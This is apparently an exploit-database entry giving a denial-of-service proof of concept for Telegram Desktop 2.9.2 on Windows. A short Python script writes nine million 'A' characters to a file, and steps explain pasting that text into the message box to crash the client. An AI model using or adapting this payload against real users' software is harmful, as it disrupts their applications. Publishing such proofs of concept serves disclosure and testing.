Telegram Desktop 2.9.2 - Denial of Service (PoC)

EDB-ID:

50247

CVE:

N/A




Platform:

Windows

Date:

2021-09-01


# Exploit Title: Telegram Desktop 2.9.2 - Denial of Service (PoC)
# Exploit Author: Aryan Chehreghani
# Date: 2021-08-30
# Vendor Homepage: https://telegram.org
# Software Link: https://telegram.org/dl/desktop/win64
# Tested Version: 2.9.2  x64
# Tested on OS: Windows 10 Enterprise

# [ About App ]

#Telegram is a messaging app with a focus on speed and security, it’s super-fast, simple and free,
#You can use Telegram on all your devices at the same time — your messages sync seamlessly across any number of your phones, tablets or computers.
#Telegram has over 500 million monthly active users and is one of the 10 most downloaded apps in the world.
#With Telegram, you can send messages, photos, videos and files of any type (doc, zip, mp3, etc), as well as create groups for up to 200,000 people or channels for broadcasting to unlimited audiences.
#You can write to your phone contacts and find people by their usernames. As a result, 
#Telegram is like SMS and email combined — and can take care of all your personal or business messaging needs,
#Telegram is  support end-to-end encrypted voice and video calls, as well as voice chats in groups for thousands of participants.

# [ POC ]

# 1.Run the python script, it will create a new file "output.txt"
# 2.Run Telegram Desktop and go to "Saved Messages"
# 3.Copy the content of the file "output.txt"
# 4.Paste the content of dos.txt into the "Write a message..."
# 5.Crashed ;)

#!/usr/bin/env python
buffer = "\x41" * 9000000
try:
    f=open("output.txt","w")
    print("[!] Creating %s bytes DOS payload...." %len(buffer))
    f.write(buffer)
    f.close()
    print("[!] File Created !")
except:
    print("File cannot be created")